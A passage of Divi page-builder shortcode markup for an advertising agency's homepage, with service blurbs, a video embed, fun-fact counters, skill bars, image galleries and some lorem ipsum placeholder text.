to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" 